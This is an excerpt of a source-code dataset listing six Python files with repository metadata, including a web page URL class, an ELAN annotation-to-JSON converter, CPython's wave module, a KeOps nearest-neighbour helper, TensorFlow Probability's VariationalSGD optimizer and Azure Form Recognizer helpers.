Dataset schema (one row per source file; ⌀ marks nullable columns):

| column | dtype | length / range |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 1 to 1.03M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 3 to 239 |
| max_stars_repo_name | string | length 5 to 130 |
| max_stars_repo_head_hexsha | string | length 40 to 78 |
| max_stars_repo_licenses | sequence | length 1 to 10 |
| max_stars_count | int64 (⌀) | 1 to 191k |
| max_stars_repo_stars_event_min_datetime | string (⌀) | length 24 |
| max_stars_repo_stars_event_max_datetime | string (⌀) | length 24 |
| max_issues_repo_path | string | length 3 to 239 |
| max_issues_repo_name | string | length 5 to 130 |
| max_issues_repo_head_hexsha | string | length 40 to 78 |
| max_issues_repo_licenses | sequence | length 1 to 10 |
| max_issues_count | int64 (⌀) | 1 to 67k |
| max_issues_repo_issues_event_min_datetime | string (⌀) | length 24 |
| max_issues_repo_issues_event_max_datetime | string (⌀) | length 24 |
| max_forks_repo_path | string | length 3 to 239 |
| max_forks_repo_name | string | length 5 to 130 |
| max_forks_repo_head_hexsha | string | length 40 to 78 |
| max_forks_repo_licenses | sequence | length 1 to 10 |
| max_forks_count | int64 (⌀) | 1 to 105k |
| max_forks_repo_forks_event_min_datetime | string (⌀) | length 24 |
| max_forks_repo_forks_event_max_datetime | string (⌀) | length 24 |
| content | string | length 1 to 1.03M |
| avg_line_length | float64 | 1 to 958k |
| max_line_length | int64 | 1 to 1.03M |
| alphanum_fraction | float64 | 0 to 1 |

Each row below is shown as a compact metadata line (path | repo | license | size | language | star/issue/fork counts) followed by the file's content.

saas/web/page.py | nattvara/saas | MIT | 730 bytes | Python | 2 stars

"""Page module."""
from __future__ import annotations
from saas.web.url import Url
class Page:
"""Page class."""
def __init__(self):
"""Create new page."""
self.urls = []
self.status_code = None
self.content_type = ''
def add_url(self, url: Url):
"""Add url.
Args:
url: Url to add
"""
self.urls.append(url)
def remove_urls_not_from_domain(self, domain: str):
"""Remove urls not from given domain.
Args:
domain: domain urls should be from
"""
cleaned = []
for url in self.urls:
if url.domain == domain:
cleaned.append(url)
self.urls = cleaned

elpis/engines/common/input/elan_to_json.py | guillaume-wisniewski/elpis | Apache-2.0 | 7,651 bytes | Python | 118 stars | 189 issues | 34 forks

#!/usr/bin/python3
"""
Get all files in the repository (recursive glob is fine for now, as long as we don't need numpy).
Pass in the corpus path; throw an error if a matching .wav file isn't found in the corpus directory.
Usage: python3 elan_to_json.py [-h] [-i INPUT_DIR] [-o OUTPUT_DIR] [-t TIER] [-j OUTPUT_JSON]
Copyright: University of Queensland, 2019
Contributors:
Nicholas Lambourne - (The University of Queensland, 2018)
"""
import argparse
import glob
import os
import sys
from typing import List, Dict, Tuple, Optional
from pympi.Elan import Eaf
from ..utilities import load_json_file, write_data_to_json_file
def save_tier_info(input_eaf: Eaf = None,
file_name: str = '',
tier_types: Optional[List] = None,
corpus_tiers_file: str = 'corpus_tiers.json'):
tiers = []
tier_types = tier_types or list()
for tier_type in tier_types:
tier_names = input_eaf.get_tier_ids_for_linguistic_type(tier_type)
tiers.append({tier_type: tier_names})
file_data = {"file": file_name, "tiers": tiers}
corpus_tiers = load_json_file(corpus_tiers_file)
corpus_tiers.append(file_data)
write_data_to_json_file(data=corpus_tiers,
file_name=corpus_tiers_file)
def process_eaf(input_elan_file: str = '',
tier_order: int = 0,
tier_type: str = '',
tier_name: str = '',
corpus_tiers_file: str = '') -> List[dict]:
"""
Method to process a particular tier in an eaf file (ELAN Annotation Format).
Transcriptions are read from an elan file tier.
Tiers are nodes from the tree structure in the .eaf file.
The tier to read from is determined by tier order (eg top tier would be order 1),
tier type (eg default-lt) or tier name (eg Phrase).
If tier type is used, the first tier matching this type is used.
Elan can have multiple tiers of same type, future work would support reading data
from multiple tiers of the selected type.
It stores the transcriptions in the following format:
{'speaker_id': <speaker_id>,
'audio_file_name': <file_name>,
'transcript': <transcription_label>,
'start_ms': <start_time_in_milliseconds>,
'stop_ms': <stop_time_in_milliseconds>}
:param input_elan_file: name of input elan file
:param tier_order: index of the elan tier to process
:param tier_type: type of the elan tier to process
:param tier_name: name of the elan tier to process
:param corpus_tiers_file list of all
:return: a list of dictionaries, where each dictionary is an annotation
"""
print(f"processing eaf {input_elan_file} using {tier_order} {tier_type} {tier_name}")
# Get paths to files
input_directory, full_file_name = os.path.split(input_elan_file)
file_name, extension = os.path.splitext(full_file_name)
# Look for wav file matching the eaf file in same directory
if os.path.isfile(os.path.join(input_directory, file_name + ".wav")):
print("WAV file found for " + file_name, file=sys.stderr)
else:
raise ValueError(f"WAV file not found for {full_file_name}. "
f"Please put it next to the eaf file in {input_directory}.")
# Get tier data from Elan file
input_eaf = Eaf(input_elan_file)
tier_types: List[str] = list(input_eaf.get_linguistic_type_names())
tier_names: List[str] = list(input_eaf.get_tier_names())
# Keep this data handy for future corpus analysis
save_tier_info(input_eaf=input_eaf,
tier_types=tier_types,
file_name=file_name,
corpus_tiers_file=corpus_tiers_file)
# Get annotations and parameters (things like speaker id) on the target tier
annotations: List[Tuple[str, str, str]] = []
annotations_data: List[dict] = []
# First try using tier order to get tier name
if tier_order:
# Watch out for files that may not have this many tiers
# tier_order is 1-index but List indexing is 0-index
try:
tier_name = tier_names[tier_order - 1]
print(f"using tier order {tier_order} to get tier name {tier_name}")
except IndexError:
print("couldn't find a tier")
pass
else:
# else use tier type to get a tier name
if tier_type in tier_types:
print(f"found tier type {tier_type}")
tier_names = input_eaf.get_tier_ids_for_linguistic_type(tier_type)
tier_name = tier_names[0]
if tier_name:
print(f"found tier name {tier_name}")
else:
print("tier type not found in this file")
if tier_name in tier_names:
print(f"using tier name {tier_name}")
annotations = input_eaf.get_annotation_data_for_tier(tier_name)
if annotations:
print(f"annotations {annotations}")
annotations = sorted(annotations)
parameters: Dict[str, str] = input_eaf.get_parameters_for_tier(tier_name)
print(f"parameters {parameters}")
speaker_id: str = parameters.get("PARTICIPANT", "")
for annotation in annotations:
start: str = annotation[0]
end: str = annotation[1]
annotation_text: str = annotation[2]
print(f"annotation {annotation} {start} {end}")
obj = {
"audio_file_name": f"{file_name}.wav",
"transcript": annotation_text,
"start_ms": start,
"stop_ms": end
}
if "PARTICIPANT" in parameters:
obj["speaker_id"] = speaker_id
annotations_data.append(obj)
return annotations_data
def main():
"""
Run the entire elan_to_json.py as a command line utility. It extracts information on speaker, audio file,
transcription etc. from the given tier of the specified .eaf file.
Usage: python3 elan_to_json.py [-h] [-i INPUT_DIR] [-o OUTPUT_DIR] [-t TIER] [-j OUTPUT_JSON]
"""
parser: argparse.ArgumentParser = argparse.ArgumentParser(
description="This script takes an directory with ELAN files and "
"slices the audio and output text in a format ready "
"for our Kaldi pipeline.")
parser.add_argument("-i", "--input_dir",
help="Directory of dirty audio and eaf files",
default="working_dir/input/data/")
parser.add_argument("-o", "--output_dir",
help="Output directory",
default="../input/output/tmp/")
parser.add_argument("-t", "--tier",
help="Target language tier name",
default="Phrase")
parser.add_argument("-j", "--output_json",
help="File path to output json")
arguments: argparse.Namespace = parser.parse_args()
# Build output directory if needed
if not os.path.exists(arguments.output_dir):
os.makedirs(arguments.output_dir)
all_files_in_directory = set(glob.glob(os.path.join(arguments.input_dir, "**"), recursive=True))
input_elan_files = [file_ for file_ in all_files_in_directory if file_.endswith(".eaf")]
annotations_data = []
for input_elan_file in input_elan_files:
annotations_data.extend(process_eaf(input_elan_file=input_elan_file,
tier_name=arguments.tier))
write_data_to_json_file(data=annotations_data,
file_name=arguments.output_json)
if __name__ == "__main__":
main()

Lib/wave.py | deadsnakes/python3.3 | PSF-2.0 | 18,579 bytes | Python | 652 stars | 8 issues | 40 forks (fork row: DaveKaretnyk/parsing-utils2, MIT)

"""Stuff to parse WAVE files.
Usage.
Reading WAVE files:
f = wave.open(file, 'r')
where file is either the name of a file or an open file pointer.
The open file pointer must have methods read(), seek(), and close().
When the setpos() and rewind() methods are not used, the seek()
method is not necessary.
This returns an instance of a class with the following public methods:
getnchannels() -- returns number of audio channels (1 for
mono, 2 for stereo)
getsampwidth() -- returns sample width in bytes
getframerate() -- returns sampling frequency
getnframes() -- returns number of audio frames
getcomptype() -- returns compression type ('NONE' for linear samples)
getcompname() -- returns human-readable version of
compression type ('not compressed' linear samples)
getparams() -- returns a tuple consisting of all of the
above in the above order
getmarkers() -- returns None (for compatibility with the
aifc module)
getmark(id) -- raises an error since the mark does not
exist (for compatibility with the aifc module)
readframes(n) -- returns at most n frames of audio
rewind() -- rewind to the beginning of the audio stream
setpos(pos) -- seek to the specified position
tell() -- return the current position
close() -- close the instance (make it unusable)
The position returned by tell() and the position given to setpos()
are compatible and have nothing to do with the actual position in the
file.
The close() method is called automatically when the class instance
is destroyed.
Writing WAVE files:
f = wave.open(file, 'w')
where file is either the name of a file or an open file pointer.
The open file pointer must have methods write(), tell(), seek(), and
close().
This returns an instance of a class with the following public methods:
setnchannels(n) -- set the number of channels
setsampwidth(n) -- set the sample width
setframerate(n) -- set the frame rate
setnframes(n) -- set the number of frames
setcomptype(type, name)
-- set the compression type and the
human-readable compression type
setparams(tuple)
-- set all parameters at once
tell() -- return current position in output file
writeframesraw(data)
                -- write audio frames without patching up the
file header
writeframes(data)
-- write audio frames and patch up the file header
close() -- patch up the file header and close the
output file
You should set the parameters before the first writeframesraw or
writeframes. The total number of frames does not need to be set,
but when it is set to the correct value, the header does not have to
be patched up.
It is best to first set all parameters, perhaps possibly the
compression type, and then write audio frames using writeframesraw.
When all frames have been written, either call writeframes('') or
close() to patch up the sizes in the header.
The close() method is called automatically when the class instance
is destroyed.
"""
import builtins
__all__ = ["open", "openfp", "Error"]
class Error(Exception):
pass
WAVE_FORMAT_PCM = 0x0001
_array_fmts = None, 'b', 'h', None, 'i'
import struct
import sys
from chunk import Chunk
def _byteswap3(data):
ba = bytearray(data)
ba[::3] = data[2::3]
ba[2::3] = data[::3]
return bytes(ba)
class Wave_read:
"""Variables used in this class:
These variables are available to the user though appropriate
methods of this class:
_file -- the open file with methods read(), close(), and seek()
set through the __init__() method
_nchannels -- the number of audio channels
available through the getnchannels() method
_nframes -- the number of audio frames
available through the getnframes() method
_sampwidth -- the number of bytes per audio sample
available through the getsampwidth() method
_framerate -- the sampling frequency
available through the getframerate() method
_comptype -- the AIFF-C compression type ('NONE' if AIFF)
available through the getcomptype() method
_compname -- the human-readable AIFF-C compression type
available through the getcomptype() method
_soundpos -- the position in the audio stream
available through the tell() method, set through the
setpos() method
These variables are used internally only:
_fmt_chunk_read -- 1 iff the FMT chunk has been read
_data_seek_needed -- 1 iff positioned correctly in audio
file for readframes()
_data_chunk -- instantiation of a chunk class for the DATA chunk
_framesize -- size of one frame in the file
"""
def initfp(self, file):
self._convert = None
self._soundpos = 0
self._file = Chunk(file, bigendian = 0)
if self._file.getname() != b'RIFF':
raise Error('file does not start with RIFF id')
if self._file.read(4) != b'WAVE':
raise Error('not a WAVE file')
self._fmt_chunk_read = 0
self._data_chunk = None
while 1:
self._data_seek_needed = 1
try:
chunk = Chunk(self._file, bigendian = 0)
except EOFError:
break
chunkname = chunk.getname()
if chunkname == b'fmt ':
self._read_fmt_chunk(chunk)
self._fmt_chunk_read = 1
elif chunkname == b'data':
if not self._fmt_chunk_read:
raise Error('data chunk before fmt chunk')
self._data_chunk = chunk
self._nframes = chunk.chunksize // self._framesize
self._data_seek_needed = 0
break
chunk.skip()
if not self._fmt_chunk_read or not self._data_chunk:
raise Error('fmt chunk and/or data chunk missing')
def __init__(self, f):
self._i_opened_the_file = None
if isinstance(f, str):
f = builtins.open(f, 'rb')
self._i_opened_the_file = f
# else, assume it is an open file object already
try:
self.initfp(f)
except:
if self._i_opened_the_file:
f.close()
raise
def __del__(self):
self.close()
#
# User visible methods.
#
def getfp(self):
return self._file
def rewind(self):
self._data_seek_needed = 1
self._soundpos = 0
def close(self):
if self._i_opened_the_file:
self._i_opened_the_file.close()
self._i_opened_the_file = None
self._file = None
def tell(self):
return self._soundpos
def getnchannels(self):
return self._nchannels
def getnframes(self):
return self._nframes
def getsampwidth(self):
return self._sampwidth
def getframerate(self):
return self._framerate
def getcomptype(self):
return self._comptype
def getcompname(self):
return self._compname
def getparams(self):
return self.getnchannels(), self.getsampwidth(), \
self.getframerate(), self.getnframes(), \
self.getcomptype(), self.getcompname()
def getmarkers(self):
return None
def getmark(self, id):
raise Error('no marks')
def setpos(self, pos):
if pos < 0 or pos > self._nframes:
raise Error('position not in range')
self._soundpos = pos
self._data_seek_needed = 1
def readframes(self, nframes):
if self._data_seek_needed:
self._data_chunk.seek(0, 0)
pos = self._soundpos * self._framesize
if pos:
self._data_chunk.seek(pos, 0)
self._data_seek_needed = 0
if nframes == 0:
return b''
if self._sampwidth in (2, 4) and sys.byteorder == 'big':
# unfortunately the fromfile() method does not take
# something that only looks like a file object, so
# we have to reach into the innards of the chunk object
import array
chunk = self._data_chunk
data = array.array(_array_fmts[self._sampwidth])
assert data.itemsize == self._sampwidth
nitems = nframes * self._nchannels
if nitems * self._sampwidth > chunk.chunksize - chunk.size_read:
nitems = (chunk.chunksize - chunk.size_read) // self._sampwidth
data.fromfile(chunk.file.file, nitems)
# "tell" data chunk how much was read
chunk.size_read = chunk.size_read + nitems * self._sampwidth
# do the same for the outermost chunk
chunk = chunk.file
chunk.size_read = chunk.size_read + nitems * self._sampwidth
data.byteswap()
data = data.tobytes()
else:
data = self._data_chunk.read(nframes * self._framesize)
if self._sampwidth == 3 and sys.byteorder == 'big':
data = _byteswap3(data)
if self._convert and data:
data = self._convert(data)
self._soundpos = self._soundpos + len(data) // (self._nchannels * self._sampwidth)
return data
#
# Internal methods.
#
def _read_fmt_chunk(self, chunk):
wFormatTag, self._nchannels, self._framerate, dwAvgBytesPerSec, wBlockAlign = struct.unpack_from('<HHLLH', chunk.read(14))
if wFormatTag == WAVE_FORMAT_PCM:
sampwidth = struct.unpack_from('<H', chunk.read(2))[0]
self._sampwidth = (sampwidth + 7) // 8
else:
raise Error('unknown format: %r' % (wFormatTag,))
self._framesize = self._nchannels * self._sampwidth
self._comptype = 'NONE'
self._compname = 'not compressed'
class Wave_write:
"""Variables used in this class:
These variables are user settable through appropriate methods
of this class:
_file -- the open file with methods write(), close(), tell(), seek()
set through the __init__() method
_comptype -- the AIFF-C compression type ('NONE' in AIFF)
set through the setcomptype() or setparams() method
_compname -- the human-readable AIFF-C compression type
set through the setcomptype() or setparams() method
_nchannels -- the number of audio channels
set through the setnchannels() or setparams() method
_sampwidth -- the number of bytes per audio sample
set through the setsampwidth() or setparams() method
_framerate -- the sampling frequency
set through the setframerate() or setparams() method
_nframes -- the number of audio frames written to the header
set through the setnframes() or setparams() method
These variables are used internally only:
_datalength -- the size of the audio samples written to the header
_nframeswritten -- the number of frames actually written
_datawritten -- the size of the audio samples actually written
"""
def __init__(self, f):
self._i_opened_the_file = None
if isinstance(f, str):
f = builtins.open(f, 'wb')
self._i_opened_the_file = f
try:
self.initfp(f)
except:
if self._i_opened_the_file:
f.close()
raise
def initfp(self, file):
self._file = file
self._convert = None
self._nchannels = 0
self._sampwidth = 0
self._framerate = 0
self._nframes = 0
self._nframeswritten = 0
self._datawritten = 0
self._datalength = 0
self._headerwritten = False
def __del__(self):
self.close()
#
# User visible methods.
#
def setnchannels(self, nchannels):
if self._datawritten:
raise Error('cannot change parameters after starting to write')
if nchannels < 1:
raise Error('bad # of channels')
self._nchannels = nchannels
def getnchannels(self):
if not self._nchannels:
raise Error('number of channels not set')
return self._nchannels
def setsampwidth(self, sampwidth):
if self._datawritten:
raise Error('cannot change parameters after starting to write')
if sampwidth < 1 or sampwidth > 4:
raise Error('bad sample width')
self._sampwidth = sampwidth
def getsampwidth(self):
if not self._sampwidth:
raise Error('sample width not set')
return self._sampwidth
def setframerate(self, framerate):
if self._datawritten:
raise Error('cannot change parameters after starting to write')
if framerate <= 0:
raise Error('bad frame rate')
self._framerate = int(round(framerate))
def getframerate(self):
if not self._framerate:
raise Error('frame rate not set')
return self._framerate
def setnframes(self, nframes):
if self._datawritten:
raise Error('cannot change parameters after starting to write')
self._nframes = nframes
def getnframes(self):
return self._nframeswritten
def setcomptype(self, comptype, compname):
if self._datawritten:
raise Error('cannot change parameters after starting to write')
if comptype not in ('NONE',):
raise Error('unsupported compression type')
self._comptype = comptype
self._compname = compname
def getcomptype(self):
return self._comptype
def getcompname(self):
return self._compname
def setparams(self, params):
nchannels, sampwidth, framerate, nframes, comptype, compname = params
if self._datawritten:
raise Error('cannot change parameters after starting to write')
self.setnchannels(nchannels)
self.setsampwidth(sampwidth)
self.setframerate(framerate)
self.setnframes(nframes)
self.setcomptype(comptype, compname)
def getparams(self):
if not self._nchannels or not self._sampwidth or not self._framerate:
raise Error('not all parameters set')
return self._nchannels, self._sampwidth, self._framerate, \
self._nframes, self._comptype, self._compname
def setmark(self, id, pos, name):
raise Error('setmark() not supported')
def getmark(self, id):
raise Error('no marks')
def getmarkers(self):
return None
def tell(self):
return self._nframeswritten
def writeframesraw(self, data):
self._ensure_header_written(len(data))
nframes = len(data) // (self._sampwidth * self._nchannels)
if self._convert:
data = self._convert(data)
if self._sampwidth in (2, 4) and sys.byteorder == 'big':
import array
a = array.array(_array_fmts[self._sampwidth])
a.frombytes(data)
data = a
assert data.itemsize == self._sampwidth
data.byteswap()
data.tofile(self._file)
self._datawritten = self._datawritten + len(data) * self._sampwidth
else:
if self._sampwidth == 3 and sys.byteorder == 'big':
data = _byteswap3(data)
self._file.write(data)
self._datawritten = self._datawritten + len(data)
self._nframeswritten = self._nframeswritten + nframes
def writeframes(self, data):
self.writeframesraw(data)
if self._datalength != self._datawritten:
self._patchheader()
def close(self):
if self._file:
try:
self._ensure_header_written(0)
if self._datalength != self._datawritten:
self._patchheader()
self._file.flush()
finally:
self._file = None
if self._i_opened_the_file:
self._i_opened_the_file.close()
self._i_opened_the_file = None
#
# Internal methods.
#
def _ensure_header_written(self, datasize):
if not self._headerwritten:
if not self._nchannels:
raise Error('# channels not specified')
if not self._sampwidth:
raise Error('sample width not specified')
if not self._framerate:
raise Error('sampling rate not specified')
self._write_header(datasize)
def _write_header(self, initlength):
assert not self._headerwritten
self._file.write(b'RIFF')
if not self._nframes:
self._nframes = initlength // (self._nchannels * self._sampwidth)
self._datalength = self._nframes * self._nchannels * self._sampwidth
self._form_length_pos = self._file.tell()
self._file.write(struct.pack('<L4s4sLHHLLHH4s',
36 + self._datalength, b'WAVE', b'fmt ', 16,
WAVE_FORMAT_PCM, self._nchannels, self._framerate,
self._nchannels * self._framerate * self._sampwidth,
self._nchannels * self._sampwidth,
self._sampwidth * 8, b'data'))
self._data_length_pos = self._file.tell()
self._file.write(struct.pack('<L', self._datalength))
self._headerwritten = True
def _patchheader(self):
assert self._headerwritten
if self._datawritten == self._datalength:
return
curpos = self._file.tell()
self._file.seek(self._form_length_pos, 0)
self._file.write(struct.pack('<L', 36 + self._datawritten))
self._file.seek(self._data_length_pos, 0)
self._file.write(struct.pack('<L', self._datawritten))
self._file.seek(curpos, 0)
self._datalength = self._datawritten
def open(f, mode=None):
if mode is None:
if hasattr(f, 'mode'):
mode = f.mode
else:
mode = 'rb'
if mode in ('r', 'rb'):
return Wave_read(f)
elif mode in ('w', 'wb'):
return Wave_write(f)
else:
raise Error("mode must be 'r', 'rb', 'w', or 'wb'")
openfp = open # B/W compatibility

densities/keops_base.py | willwhitney/exploration-reimplementation | Apache-2.0 | 581 bytes | Python | 2 stars

import torch
from matplotlib import pyplot as plt
from pykeops.torch import LazyTensor
use_cuda = torch.cuda.is_available()
tensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor
def new(dim):
return None
def update_batch(index, data):
data = tensor(data)
X_j = LazyTensor(data[None, :, :])
return X_j
def get_nn_batch(index, queries, n_neighbors=16):
X_j = index
X_i = LazyTensor(tensor(queries)[:, None, :])
D_ij = ((X_i - X_j) ** 2).sum(-1)
return D_ij.argKmin(n_neighbors, dim=1)
def convert_array(x):
return tensor(x)

tensorflow_probability/python/optimizer/variational_sgd.py | PavanKishore21/probability | Apache-2.0 | 10,844 bytes | Python | 2 stars

# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""An optimizer module for constant stochastic gradient descent."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.internal import assert_util
from tensorflow_probability.python.internal import distribution_util
from tensorflow_probability.python.internal import dtype_util
from tensorflow.python.training import training_ops
__all__ = [
'VariationalSGD',
]
class VariationalSGD(tf.optimizers.Optimizer):
"""An optimizer module for constant stochastic gradient descent.
This implements an optimizer module for the constant stochastic gradient
descent algorithm [(Mandt et al., 2017)][1]. The optimization variable is
regarded as an approximate sample from the posterior .
Note: If a prior is included in the loss, it should be scaled by
`1/num_pseudo_batches`, where num_pseudo_batches is the number of minibatches
in the data. I.e., it should be divided by the `num_pseudo_batches` term
described below.
Args:
batch_size: Scalar `int`-like `Tensor`. The number of examples in a
minibatch in the data set. Note: Assumes the loss is taken as the mean
over a minibatch. Otherwise if the sum was taken set this to 1.
total_num_examples: Scalar `int`-like `Tensor`. The total number of examples
in the data set.
max_learning_rate: Scalar `float`-like `Tensor`. A maximum allowable
effective coordinate-wise learning rate. The algorithm scales down any
effective learning rate (i.e. after preconditioning) that is larger than
this. (Default: `1`)
preconditioner_decay_rate: Scalar `float`-like `Tensor`. The exponential
decay rate of the rescaling of the preconditioner (RMSprop). (This is
"alpha" in Mandt et al. (2017)). Should be smaller than but nearly `1` to
approximate sampling from the posterior. (Default: `0.95`)
burnin: Scalar `int`-like `Tensor`. The number of iterations to collect
gradient statistics to update the preconditioner before starting to draw
noisy samples. (Default: `25`)
burnin_max_learning_rate: Scalar `float`-like `Tensor`. Maximum learning
rate to use during the burnin period.
(Default: `1e-8`)
use_single_learning_rate: Boolean Indicates whether one single learning
rate is used or coordinate_wise learning rates are used.
(Default: `False`)
name: Python `str` describing ops managed by this function.
(Default: `"VariationalSGD"`)
Raises:
InvalidArgumentError: If preconditioner_decay_rate is a `Tensor` not in
`(0,1]`.
#### References
[1]: Stephan Mandt, Matthew D. Hoffman, and David M. Blei. Stochastic
Gradient Descent as Approximate Bayesian Inference. _arXiv preprint
arXiv:1704.04289_, 2017. https://arxiv.org/abs/1704.04289
"""
def __init__(self,
batch_size,
total_num_examples,
max_learning_rate=1.,
preconditioner_decay_rate=0.95,
burnin=25,
burnin_max_learning_rate=1e-6,
use_single_learning_rate=False,
name=None):
default_name = 'VariationalSGD'
with tf.name_scope(name or default_name):
self._preconditioner_decay_rate = tf.convert_to_tensor(
preconditioner_decay_rate, name='preconditioner_decay_rate')
self._batch_size = tf.convert_to_tensor(
batch_size, name='batch_size')
self._total_num_examples = tf.convert_to_tensor(
total_num_examples, name='total_num_examples')
self._burnin = tf.convert_to_tensor(
burnin,
name='burnin',
dtype=dtype_util.common_dtype([burnin], dtype_hint=tf.int64))
self._burnin_max_learning_rate = tf.convert_to_tensor(
burnin_max_learning_rate, name='burnin_max_learning_rate')
self._max_learning_rate = tf.convert_to_tensor(
max_learning_rate, name='max_learning_rate')
self._use_single_learning_rate = use_single_learning_rate
self._preconditioner_decay_rate = distribution_util.with_dependencies([
assert_util.assert_non_negative(
self._preconditioner_decay_rate,
message='`preconditioner_decay_rate` must be non-negative'),
assert_util.assert_less_equal(
self._preconditioner_decay_rate,
1.,
message='`preconditioner_decay_rate` must be at most 1.'),
], self._preconditioner_decay_rate)
self._batch_size = distribution_util.with_dependencies([
assert_util.assert_greater(
self._batch_size,
0,
message='`batch_size` must be greater than zero')
], self._batch_size)
self._total_num_examples = distribution_util.with_dependencies([
assert_util.assert_greater(
self._total_num_examples,
0,
message='`total_num_examples` must be greater than zero')
], self._total_num_examples)
self._burnin = distribution_util.with_dependencies([
assert_util.assert_non_negative(
self._burnin, message='`burnin` must be non-negative'),
assert_util.assert_integer(
self._burnin, message='`burnin` must be an integer')
], self._burnin)
self._burnin_max_learning_rate = distribution_util.with_dependencies([
assert_util.assert_non_negative(
self._burnin_max_learning_rate,
message='`burnin_max_learning_rate` must be non-negative')
], self._burnin_max_learning_rate)
self._max_learning_rate = distribution_util.with_dependencies([
assert_util.assert_non_negative(
self._max_learning_rate,
message='`max_learning_rate` must be non-negative')
], self._max_learning_rate)
super(VariationalSGD, self).__init__(name=name or default_name)
def get_config(self):
# TODO(b/124800185): Consider migrating `max_learning_rate`, `burnin`,
# `preconditioner_decay_rate` and other properties into optimizer
# hyperparameters.
pass
def _create_slots(self, var_list):
for var in var_list:
self.add_slot(var, 'first_moment', 'zeros')
self.add_slot(var, 'second_moment', 'zeros')
def _prepare(self, var_list):
self._decay_tensor = tf.convert_to_tensor(
self._preconditioner_decay_rate, name='preconditioner_decay_rate')
self._batch_size_tensor = tf.convert_to_tensor(
self._batch_size, name='batch_size_tensor')
super(VariationalSGD, self)._prepare(var_list)
def _get_coordinatewise_learning_rate(self, grad, var):
# Compute the learning rate using a moving average for the diagonal of BB^T
avg_first = self.get_slot(var, 'first_moment')
avg_second = self.get_slot(var, 'second_moment')
decay_tensor = tf.cast(self._decay_tensor, var.dtype)
batch_size = tf.cast(self._batch_size_tensor, var.dtype)
# Create an estimator for the moving average of gradient mean and variance
# via Welford's algorithm
if isinstance(grad, tf.Tensor):
delta = grad - avg_first
first_moment_update = avg_first.assign_add(
delta * tf.where(
self.iterations < 1,
dtype_util.as_numpy_dtype(var.dtype)(1.),
1. - decay_tensor))
with tf.control_dependencies([first_moment_update]):
second_moment_update = avg_second.assign_add(
tf.cast(self.iterations < 1, var.dtype) * -(1. - decay_tensor) *
(avg_second - decay_tensor * tf.square(delta)))
diag_preconditioner = distribution_util.with_dependencies(
[second_moment_update],
tf.clip_by_value(avg_second, 1e-12, 1e12))
elif isinstance(grad, tf.IndexedSlices):
delta = grad.values - tf.gather_nd(avg_first, grad.indices)
first_moment_update = tf.compat.v1.scatter_add(
avg_first, grad.indices,
delta * tf.where(
self.iterations < 1,
dtype_util.as_numpy_dtype(var.dtype)(1.),
1. - decay_tensor))
with tf.control_dependencies([first_moment_update]):
avg_second = tf.compat.v1.scatter_add(
avg_second, grad.indices,
tf.cast(self.iterations < 1, var.dtype) * -(1. - decay_tensor) *
(tf.gather_nd(avg_second, grad.indices) -
decay_tensor * tf.square(delta)))
avg_second = tf.gather_nd(avg_second, grad.indices)
# TODO(b/70783772): Needs dtype specific clipping.
diag_preconditioner = tf.clip_by_value(avg_second, 1e-12, 1e12)
else:
raise tf.errors.InvalidArgumentError(
None, None, 'grad must of type Tensor or IndexedSlice')
diag_preconditioner *= batch_size
if self._use_single_learning_rate:
diag_preconditioner = tf.reduce_mean(diag_preconditioner)
# From Theorem 2 Corollary 1 of Mandt et al. 2017
return 2. * batch_size / (
tf.cast(self._total_num_examples, var.dtype.base_dtype) *
diag_preconditioner)
def _resource_apply_dense(self, grad, var):
max_learning_rate = tf.where(
self.iterations < tf.cast(self._burnin, tf.int64),
self._burnin_max_learning_rate,
self._max_learning_rate)
learn_rates = tf.clip_by_value(
self._get_coordinatewise_learning_rate(grad, var), 0.,
tf.cast(max_learning_rate, var.dtype.base_dtype))
newgrad = grad * learn_rates
return training_ops.resource_apply_gradient_descent(
var.handle,
tf.cast(1., var.dtype),
newgrad,
use_locking=self._use_locking)
def _resource_apply_sparse(self, grad, var, indices):
max_learning_rate = tf.where(
self.iterations < tf.cast(self._burnin, tf.int64),
self._burnin_max_learning_rate, self._max_learning_rate)
learn_rate = tf.clip_by_value(
self._get_coordinatewise_learning_rate(
tf.IndexedSlices(grad, indices), var),
0., tf.cast(max_learning_rate, var.dtype))
delta = grad * learn_rate
return self._resource_scatter_add(var, indices, -delta)

sdk/formrecognizer/azure-ai-formrecognizer/azure/ai/formrecognizer/_helpers.py | vbarbaresi/azure-sdk-for-python | MIT | 4,395 bytes | Python | 8 stars

# coding=utf-8
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import re
import six
from azure.core.credentials import AzureKeyCredential
from azure.core.pipeline.policies import AzureKeyCredentialPolicy
from azure.core.pipeline.transport import HttpTransport
POLLING_INTERVAL = 5
COGNITIVE_KEY_HEADER = "Ocp-Apim-Subscription-Key"
def _get_deserialize():
from ._generated.v2_1_preview_1 import FormRecognizerClient
return FormRecognizerClient("dummy", "dummy")._deserialize # pylint: disable=protected-access
def get_element_type(element_pointer):
word_ref = re.compile(r'/readResults/\d+/lines/\d+/words/\d+')
if re.search(word_ref, element_pointer):
return "word"
line_ref = re.compile(r'/readResults/\d+/lines/\d+')
if re.search(line_ref, element_pointer):
return "line"
return None
def get_element(element_pointer, read_result):
indices = [int(s) for s in re.findall(r"\d+", element_pointer)]
read = indices[0]
if get_element_type(element_pointer) == "word":
line = indices[1]
word = indices[2]
ocr_word = read_result[read].lines[line].words[word]
return "word", ocr_word, read+1
if get_element_type(element_pointer) == "line":
line = indices[1]
ocr_line = read_result[read].lines[line]
return "line", ocr_line, read+1
return None, None, None
def adjust_value_type(value_type):
if value_type == "array":
value_type = "list"
if value_type == "number":
value_type = "float"
if value_type == "object":
value_type = "dictionary"
return value_type
def adjust_confidence(score):
"""Adjust confidence when not returned.
"""
if score is None:
return 1.0
return score
def adjust_text_angle(text_angle):
"""Adjust to (-180, 180]
"""
if text_angle > 180:
text_angle -= 360
return text_angle
